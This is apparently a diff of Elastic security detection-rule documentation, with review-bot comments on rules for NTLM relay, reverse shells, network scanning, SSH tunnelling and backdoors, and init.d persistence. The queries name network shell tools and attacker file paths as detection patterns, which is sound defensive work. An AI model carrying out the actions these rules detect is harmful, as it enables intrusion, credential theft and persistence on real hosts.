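Review bot: in the Potential Linux Tunneling and/or Port Forwarding query, the ssh clause `process.args in ("-R", "-L", "D", "-w")` lists "D" without the leading dash; ssh's dynamic (SOCKS) forwarding flag is `-D`, and a bare "D" argument never matches it, so the dynamic-forwarding case this clause is meant to cover is silently skipped. Change it to `process.args in ("-R", "-L", "-D", "-w")`. Since `in` is an exact token match, it would also help to note in the `// ssh` comment that only the separated form (flag followed by its argument as a distinct token) is covered.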
@@ -0,0 +1,87 @@ +[[prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http]] +=== Potential Local NTLM Relay via HTTP + +Identifies attempt to coerce a local NTLM authentication via HTTP using the Windows Printer Spooler service as a target. An adversary may use this primitive in combination with other techniques to elevate privileges on a compromised system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/med0x2e/NTLMRelay2Self +* https://github.com/topotam/PetitPotam +* https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.name : "rundll32.exe" and + + /* Rundll32 WbeDav Client */ + process.args : ("?:\\Windows\\System32\\davclnt.dll,DavSetCookie", "?:\\Windows\\SysWOW64\\davclnt.dll,DavSetCookie") and + + /* Access to named pipe via http */ + process.args : ("http*/print/pipe/*", "http*/pipe/spoolss", "http*/pipe/srvsvc") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Exploitation for Credential Access +** ID: T1212 +** Reference URL: https://attack.mitre.org/techniques/T1212/ +* Tactic: +** Name: Defense 
Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc new file mode 100644 index 0000000000..e04e4e1dca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps.asciidoc 
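Review bot: in the Potential Local NTLM Relay via HTTP query, the comment `/* Rundll32 WbeDav Client */` misspells WebDAV; davclnt.dll is the Windows WebDAV client library, so the comment should read `/* Rundll32 WebDAV Client */`. In the description, "Identifies attempt to coerce" needs an article ("Identifies an attempt to coerce"), and the Windows service is the "Print Spooler" service, not "Printer Spooler".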
@@ -0,0 +1,134 @@ +[[prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps]] +=== Potential Masquerading as Communication Apps + +Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and + event.type == "start" and + ( + /* Slack */ + (process.name : "slack.exe" and not + (process.code_signature.subject_name in ( + "Slack Technologies, Inc.", + "Slack Technologies, LLC" + ) and process.code_signature.trusted == true) + ) or + + /* WebEx */ + (process.name : "WebexHost.exe" and not + (process.code_signature.subject_name in ("Cisco WebEx LLC", "Cisco Systems, Inc.") and process.code_signature.trusted == true) + ) or + + /* Teams */ + (process.name : "Teams.exe" and not + (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Discord */ + (process.name : "Discord.exe" and not + (process.code_signature.subject_name == "Discord Inc." and process.code_signature.trusted == true) + ) or + + /* RocketChat */ + (process.name : "Rocket.Chat.exe" and not + (process.code_signature.subject_name == "Rocket.Chat Technologies Corp." 
and process.code_signature.trusted == true) + ) or + + /* Mattermost */ + (process.name : "Mattermost.exe" and not + (process.code_signature.subject_name == "Mattermost, Inc." and process.code_signature.trusted == true) + ) or + + /* WhatsApp */ + (process.name : "WhatsApp.exe" and not + (process.code_signature.subject_name in ( + "WhatsApp LLC", + "WhatsApp, Inc", + "24803D75-212C-471A-BC57-9EF86AB91435" + ) and process.code_signature.trusted == true) + ) or + + /* Zoom */ + (process.name : "Zoom.exe" and not + (process.code_signature.subject_name == "Zoom Video Communications, Inc." and process.code_signature.trusted == true) + ) or + + /* Outlook */ + (process.name : "outlook.exe" and not + (process.code_signature.subject_name == "Microsoft Corporation" and process.code_signature.trusted == true) + ) or + + /* Thunderbird */ + (process.name : "thunderbird.exe" and not + (process.code_signature.subject_name == "Mozilla Corporation" and process.code_signature.trusted == true) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Sub-technique: +** Name: Invalid Code Signature +** ID: T1036.001 +** Reference URL: https://attack.mitre.org/techniques/T1036/001/ +* Sub-technique: +** Name: Match Legitimate Name or Location +** ID: T1036.005 +** Reference URL: https://attack.mitre.org/techniques/T1036/005/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ 
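Review bot: the *Tags* list in this hunk carries only "Tactic: Defense Evasion", while the *Framework* block at the end maps the rule to both Defense Evasion (TA0005) and Persistence (TA0003, T1554); other rules in this package keep the two in sync (the NTLM relay rule tags both Credential Access and Defense Evasion), so add "* Tactic: Persistence" to the tags or drop the Persistence mapping from the framework block.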
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc new file mode 100644 index 0000000000..f94f140298 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc 
@@ -0,0 +1,81 @@ +[[prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell]] +=== Potential Meterpreter Reverse Shell + +This detection rule identifies a sample of suspicious Linux system file reads used for system fingerprinting, leveraged by the Metasploit Meterpreter shell to gather information about the target that it is executing its shell on. Detecting this pattern is indicative of a successful meterpreter shell connection. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-auditd_manager.auditd-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sample by host.id, process.pid, user.id +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/etc/machine-id"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/etc/passwd"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/proc/net/route"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == "/proc/net/ipv6_route"] +[file where host.os.type == "linux" and event.dataset == "auditd_manager.auditd" and auditd.data.syscall == "open" and + auditd.data.a2 == "1b6" and file.path == 
"/proc/net/if_inet6"] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc new file mode 100644 index 0000000000..b1f99bb4cd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc 
@@ -0,0 +1,74 @@ +[[prebuilt-rule-8-10-5-potential-network-scan-detected]] +=== Potential Network Scan Detected + +This rule identifies a potential port scan. A port scan is a method utilized by attackers to systematically scan a target system or network for open ports, allowing them to identify available services and potential vulnerabilities. By mapping out the open ports, attackers can gather critical information to plan and execute targeted attacks, gaining unauthorized access, compromising security, and potentially leading to data breaches, unauthorized control, or further exploitation of the targeted system or network. This rule proposes threshold logic to check for connection attempts from one source host to 20 or more destination ports. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.network-* +* logs-network_traffic.* +* packetbeat-* +* filebeat-* +* auditbeat-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : * and event.action : "network_flow" and source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* 
Technique: +** Name: Active Scanning +** ID: T1595 +** Reference URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc new file mode 100644 index 0000000000..8b46a691ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-scan-executed-from-host.asciidoc 
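Review bot: in the Potential Network Scan Detected rule, the description promises "threshold logic to check for connection attempts from one source host to 20 or more destination ports", but nothing in the rendered hunk shows that logic: the query is only `destination.port : * and event.action : "network_flow" and source.ip : (...)`, and the threshold grouping and the cardinality condition on destination.port are rule settings this page does not render, so suggest stating them explicitly in the description or in a short note under the query. Separately, `event.action : "network_flow"` is the action emitted by the network_traffic/packetbeat data, whereas Elastic Defend network events on logs-endpoint.events.network-* use actions such as "connection_attempted" (see the Potential Non-Standard Port SSH connection rule in this same package), so the endpoint index in *Rule indices* will contribute no matches unless the action filter is widened.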
@@ -0,0 +1,60 @@ +[[prebuilt-rule-8-10-5-potential-network-scan-executed-from-host]] +=== Potential Network Scan Executed From Host + +This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. + +*Rule type*: threshold + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Discovery +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.action:exec and event.type:start and +process.name:(ping or nping or hping or hping2 or hping3 or nc or ncat or netcat or socat) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc new file mode 100644 index 0000000000..ba9ca703e6 --- /dev/null 
+++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc 
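Review bot: in the Potential Network Scan Executed From Host rule, the description calls this a threshold rule but never says what the threshold is (how many executions, grouped by which field), which makes the alert hard to tune; the query itself is only the process-name filter. Suggest documenting the count and grouping in the description. The description also speaks only of "ping sweeps", while the list includes nc, ncat, netcat and socat, which are connection tools rather than ICMP tools; "ping sweeps or port probes" would describe the query more accurately.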
@@ -0,0 +1,75 @@ +[[prebuilt-rule-8-10-5-potential-network-sweep-detected]] +=== Potential Network Sweep Detected + +This rule identifies a potential network sweep. A network sweep is a method used by attackers to scan a target network, identifying active hosts, open ports, and available services to gather information on vulnerabilities and weaknesses. This reconnaissance helps them plan subsequent attacks and exploit potential entry points for unauthorized access, data theft, or other malicious activities. This rule proposes threshold logic to check for connection attempts from one source host to 10 or more destination hosts on commonly used network services. + +*Rule type*: threshold + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* +* logs-endpoint.events.network-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 5 + +*References*: None + +*Tags*: + +* Domain: Network +* Tactic: Discovery +* Tactic: Reconnaissance +* Use Case: Network Security Monitoring + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +destination.port : (21 or 22 or 23 or 25 or 139 or 445 or 3389 or 5985 or 5986) and +source.ip : (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: Network Service Discovery +** ID: T1046 +** Reference URL: https://attack.mitre.org/techniques/T1046/ +* Tactic: +** Name: Reconnaissance +** ID: TA0043 +** Reference URL: https://attack.mitre.org/tactics/TA0043/ +* Technique: +** Name: Active Scanning +** ID: T1595 +** Reference 
URL: https://attack.mitre.org/techniques/T1595/ +* Sub-technique: +** Name: Scanning IP Blocks +** ID: T1595.001 +** Reference URL: https://attack.mitre.org/techniques/T1595/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc new file mode 100644 index 0000000000..a6991658ba --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection.asciidoc 
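Review bot: in the Potential Network Sweep Detected rule, the query `destination.port : (21 or 22 or 23 or 25 or 139 or 445 or 3389 or 5985 or 5986) and source.ip : (...)` has no event.action or event.category condition, unlike the companion Potential Network Scan Detected rule, which filters on `event.action : "network_flow"`; on the shared indices this means every document carrying a listed destination.port counts toward the threshold, including endpoint connection events, so the two rules count different things on the same data. Either align the two filters or state in the description why the sweep rule deliberately takes all event types. As with the scan rule, the "10 or more destination hosts" threshold is not visible in the rendered query and should be documented.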
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-potential-non-standard-port-ssh-connection]] +=== Potential Non-Standard Port SSH connection + +Identifies potentially malicious processes communicating via a port paring typically not associated with SSH. For example, SSH over port 2200 or port 2222 as opposed to the traditional port 22. Adversaries may make changes to the standard port a protocol uses to bypass filtering or muddle analysis/parsing of network data. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://attack.mitre.org/techniques/T1571/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Command and Control +* OS: macOS +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id with maxspan=1m + [process where event.action == "exec" and process.name:"ssh" and not process.parent.name in ( + "rsync", "pyznap", "git", "ansible-playbook", "scp", "pgbackrest", "git-lfs", "expect", "Sourcetree", "ssh-copy-id", + "run" + ) + ] + [network where process.name:"ssh" and event.action in ("connection_attempted", "connection_accepted") and + destination.port != 22 and destination.ip != "127.0.0.1" and network.transport: "tcp" + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Non-Standard Port +** ID: T1571 +** Reference URL: https://attack.mitre.org/techniques/T1571/ 
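Review bot: the network clause in this hunk excludes loopback only as `destination.ip != "127.0.0.1"`, so connections to the IPv6 loopback address (::1) and to other 127.0.0.0/8 addresses still pass the filter and alert even though they are local; consider `not destination.ip in ("127.0.0.1", "::1")` or a CIDR check. The process clause also has no `host.os.type` condition even though the tags restrict the rule to Linux and macOS, which differs from every other EQL rule in this package. In the description, "port paring" should be "port pairing", and the title's "SSH connection" should be "SSH Connection" to match the capitalization of the other rule titles.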
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc new file mode 100644 index 0000000000..4b552aa0dd --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity.asciidoc 
@@ -0,0 +1,103 @@ +[[prebuilt-rule-8-10-5-potential-openssh-backdoor-logging-activity]] +=== Potential OpenSSH Backdoor Logging Activity + +Identifies a Secure Shell (SSH) client or server process creating or writing to a known SSH backdoor log file. Adversaries may modify SSH related binaries for persistence or credential access via patching sensitive functions to enable unauthorized access or to log SSH credentials for exfiltration. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/eset/malware-ioc/tree/master/sshdoor +* https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "change" and process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh") and + ( + (file.name : (".*", "~*", "*~") and not file.name : (".cache", ".viminfo", ".bash_history", ".google_authenticator", + ".jelenv", ".csvignore", ".rtreport")) or + file.extension : ("in", "out", "ini", "h", "gz", "so", "sock", "sync", "0", "1", "2", "3", "4", "5", "6", "7", "8", "9") or + file.path : + ( + "/private/etc/*--", + "/usr/share/*", + "/usr/include/*", + "/usr/local/include/*", + "/private/tmp/*", + "/private/var/tmp/*", + "/usr/tmp/*", + "/usr/share/man/*", + "/usr/local/share/*", + "/usr/lib/*.so.*", + "/private/etc/ssh/.sshd_auth", + "/usr/bin/ssd", + 
"/private/var/opt/power", + "/private/etc/ssh/ssh_known_hosts", + "/private/var/html/lol", + "/private/var/log/utmp", + "/private/var/lib", + "/var/run/sshd/sshd.pid", + "/var/run/nscd/ns.pid", + "/var/run/udev/ud.pid", + "/var/run/udevd.pid" + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Modify Authentication Process +** ID: T1556 +** Reference URL: https://attack.mitre.org/techniques/T1556/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Compromise Client Software Binary +** ID: T1554 +** Reference URL: https://attack.mitre.org/techniques/T1554/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc new file mode 100644 index 0000000000..81a96edf46 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc 
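Review bot: the `file.path` list in the rule query mixes macOS-style `/private/etc/*`, `/private/tmp/*`, `/private/var/*` entries with Linux paths, but the leading `host.os.type == "linux"` clause (and the `OS: Linux` tag) means those `/private/...` branches can never match on the hosts this rule runs against; either drop them or, if the rule is meant to cover macOS as well, widen the OS filter and the tags together. A second, smaller point: `process.executable : ("/usr/sbin/sshd", "/usr/bin/ssh")` only matches the two stock install paths, so an sshd built from source under `/usr/local/sbin` falls outside the rule; consider also matching on `process.name` or documenting that limitation in the description.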
@@ -0,0 +1,138 @@ +[[prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected]] +=== Potential Persistence Through init.d Detected + +Files that are placed in the /etc/init.d/ directory in Unix can be used to start custom applications, services, scripts or commands during start-up. Init.d has been mostly replaced in favor of Systemd. However, the "systemd-sysv-generator" can convert init.d files to service unit files that run at boot. Adversaries may add or alter files located in the /etc/init.d/ directory to execute malicious code upon boot in order to gain persistence on the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.intezer.com/blog/malware-analysis/hiddenwasp-malware-targeting-linux-systems/ +* https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#8-boot-or-logon-initialization-scripts-rc-scripts +* https://www.cyberciti.biz/faq/how-to-enable-rc-local-shell-script-on-systemd-while-booting-linux-system/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 6 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Potential Persistence Through init.d Detected + +The `/etc/init.d` directory is used in Linux systems to store the initialization scripts for various services and daemons that are executed during system startup and shutdown. 
+ +Attackers can abuse files within the `/etc/init.d/` directory to run scripts, commands or malicious software every time a system is rebooted by converting an executable file into a service file through the `systemd-sysv-generator`. After conversion, a unit file is created within the `/run/systemd/generator.late/` directory. + +This rule looks for the creation of new files within the `/etc/init.d/` directory. Executable files in these directories will automatically run at boot with root privileges. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. +> This investigation guide uses {security-guide}/security/current/osquery-placeholder-fields.html[placeholder fields] to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run. +#### Possible Investigation Steps + +- Investigate the file that was created or modified. + - !{osquery{"label":"Osquery - Retrieve File Information","query":"SELECT * FROM file WHERE path = {{file.path}}"}} +- Investigate whether any other files in the `/etc/init.d/` or `/run/systemd/generator.late/` directories have been altered. 
+ - !{osquery{"label":"Osquery - Retrieve File Listing Information","query":"SELECT * FROM file WHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')"}} + - !{osquery{"label":"Osquery - Retrieve Additional File Listing Information","query":"SELECT\n f.path,\n u.username AS file_owner,\n g.groupname AS group_owner,\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\n datetime(f.btime, 'unixepoch') AS file_created_time,\n f.size AS size_bytes\nFROM\n file f\n LEFT JOIN users u ON f.uid = u.uid\n LEFT JOIN groups g ON f.gid = g.gid\nWHERE (path LIKE '/etc/init.d/%' OR path LIKE '/run/systemd/generator.late/%')\n"}} +- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations. + - !{osquery{"label":"Osquery - Retrieve Running Processes by User","query":"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username"}} +- Investigate syslog through the `sudo cat /var/log/syslog | grep 'LSB'` command to find traces of the LSB header of the script (if present). If syslog is being ingested into Elasticsearch, the same can be accomplished through Kibana. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Validate whether this activity is related to planned patches, updates, network administrator activity, or legitimate software installations. +- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. + - If scripts or executables were dropped, retrieve the files and determine if they are malicious: + - Use a private sandboxed malware analysis system to perform analysis. 
+ - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - Check if the domain is newly registered or unexpected. + - Check the reputation of the domain or IP address. + - File access, modification, and creation activities. + - Cron jobs, services and other persistence mechanisms. + - !{osquery{"label":"Osquery - Retrieve Crontab Information","query":"SELECT * FROM crontab"}} + +### False Positive Analysis + +- If this activity is related to new benign software installation activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- If this activity is related to a system administrator who uses init.d for administrative purposes, consider adding exceptions for this specific administrator user account. +- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need. + +### Related Rules + +- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. 
